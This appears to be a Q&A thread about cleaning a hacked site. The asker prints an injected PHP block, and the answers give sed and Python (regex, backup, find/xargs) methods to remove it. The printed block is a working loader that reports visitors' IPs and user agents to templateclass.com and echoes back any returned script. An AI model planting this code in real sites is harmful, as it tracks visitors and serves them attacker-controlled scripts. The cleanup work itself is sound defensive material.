Find-and-replace multiple complex lines in Linux

Question

I'm trying to clean up a security breach. I want to find all instances of the offending PHP code on the web directory and remove them. It looks like this:

<?php
#c9806e#
error_reporting(0); ini_set('display_errors',0); $wp_xoy23462 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_xoy23462) && !preg_match ('/bot/i', $wp_xoy23462))){
$wp_xoy0923462="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_xoy23462);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_xoy0923462);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_23462xoy = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_23462xoy,1,3) === 'scr' ){ echo $wp_23462xoy; }
#/c9806e#
?>
<?php

?>

(c9806e is a random alphanumeric string)

I've found lots of resources for using find, sed, and grep to replace simple things. I can probably cobble up something based on all that, but I would not be sure that it works, or that it won't break anything.

Here are the tools I have:

• GNU Awk 3.1.7
• GNU grep 2.6.3
• GNU sed 4.2.1
• GNU find 4.4.2

---

Here's the offending code with escaped characters.

<\?php
#\w+#
error_reporting\(0\); ini_set\('display_errors',0\); $wp_xoy23462 = @$_SERVER\['HTTP_USER_AGENT'\];
if \(\( preg_match \('/Gecko\|MSIE/i', $wp_xoy23462\) && !preg_match \('/bot/i', $wp_xoy23462\)\)\)\{
$wp_xoy0923462="http://"\."template"\."class"\."\.com/class"\."/\?ip="\.$_SERVER\['REMOTE_ADDR'\]\."&referer="\.urlencode\($_SERVER\['HTTP_HOST'\]\)\."&ua="\.urlencode\($wp_xoy23462\);
$ch = curl_init\(\); curl_setopt \($ch, CURLOPT_URL,$wp_xoy0923462\);
curl_setopt \($ch, CURLOPT_TIMEOUT, 6\); curl_setopt\($ch, CURLOPT_RETURNTRANSFER, 1\); $wp_23462xoy = curl_exec \($ch\); curl_close\($ch\);\}
if \( substr\($wp_23462xoy,1,3\) === 'scr' \)\{ echo $wp_23462xoy; \}
#/w+#
\?>
<\?php

\?>

Edit: As it turned out, some of the linebreaks were \r\n instead of \n. (Others were just '\n'.)

Answer 1

sed -n '1! H;1 h
$ {x
: again
  \|<?php\n#\([[:alnum:]]\{1,\}\)#\nerror_reporting(0).*#/\1#\n?>\n<\?php\n\n\?>| s///
  t again
  p
  }'

version that seems to work on GNU sed (thanks @leewangzhong)

sed -n '1! H;1 h
$ {x
: again
  \|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
  t again
  p
  }'

Try something like this but it depend really of internal code format (\n, space, ...)

concept:

1. load all the file in buffer (sed work line by line by default) to allow the \n pattern

   1! H;1 h

is used for loading each line at read time (from working buffer) into hold buffer

$ {x

take back x info from hold buffer into working buffer (swap content in fact) when at the last line $, so sed is now working on the full file including \n at end of each line

1. search and modify (remove) a pattern starting with
2. if found one, restart the operation (so with a new ID)
3. if not found (so no more bad code), print the result (cleaned code)

Answer 2

Using Python instead of sed for the replacement.

The regex:

<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>

The regex with comments:

<\?php                  #Start of PHP code (escape the '?')
\s+                     #Match any number of whitespace
#(\w+)#\s+              #Hax header: one or more alphanumeric
                          #symbols, and use parens to remember this group
error_reporting\(0\)    #To be really sure that this isn't innocent code,
                          #we check for turning off error reporting.
[^#]+                   #Match any character until the next #, including
                          #newlines.
#/\1#\s+                #Hax footer (using \1 to refer to the header code)
\?>                     #End of the PHP code
[^>]+>                  #Also catch the dummy <?php ?> that was added:
                          #match up to the next closing '>'


# $find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out

The Python script:

#Python 2.6

import re
haxpattern = r"<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>"
haxre = re.compile(haxpattern)

#Takes in two file paths
#Prints from the infile to the outfile, with the hax removed
def unhax(input,output):
    with open(input) as infile:
        with open(output,'w') as outfile:
            whole = infile.read() #read the entire file, yes
            match = haxre.search(whole)

            if not match: #not found
                return

            #output to file
            outfile.write(whole[:match.start()]) #before hax
            outfile.write(whole[match.end():])   #after hax
    #return the removed portion
    return match.group()

def process_and_backup(fname):
    backup = fname+'.bak2014';

    #move file to backup
    import os
    os.rename( fname, backup )

    try:
        #process
        print '--',fname,'--'
        print unhax(input=backup, output=fname)
    except Exception:
        #failed, undo move
        os.rename( backup, fname)
        raise

def main():
    import sys
    for arg in sys.argv[1:]:
        process_and_backup(arg)

if __name__=='__main__':
    main()

The command:

find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out

The command, explained:

find         #Find,
    .             #starting in the current folder,
    -type f        #files only (not directories)
    -name "*.php"   #which have names with extension .php
    -exec grep       #and execute grep on each file with these args:
        -l               #Print file names only (instead of matching lines)
        --null           #End prints with the NUL char instead of a newline
        "wp_xoy0923462"  #Look for this string
        {}               #in this program ("{}" being a placeholder for `find`)
    \;               #(End of the -exec command
|            #Use the output from above as the stdin for this program:
xargs        #Read from stdin, and for each string that ends
    -0        #with a NUL char (instead of whitespace)
    -I fname  #replace "fname" with that string (instead of making a list of args)
              #in the following command:
    python             #Run the Python script
        unhaxphp.py    #with this filename, and pass as argument:
            fname          #the filename of the .php file to unhax
    >> unhax.out   #and append stdout to this file instead of the console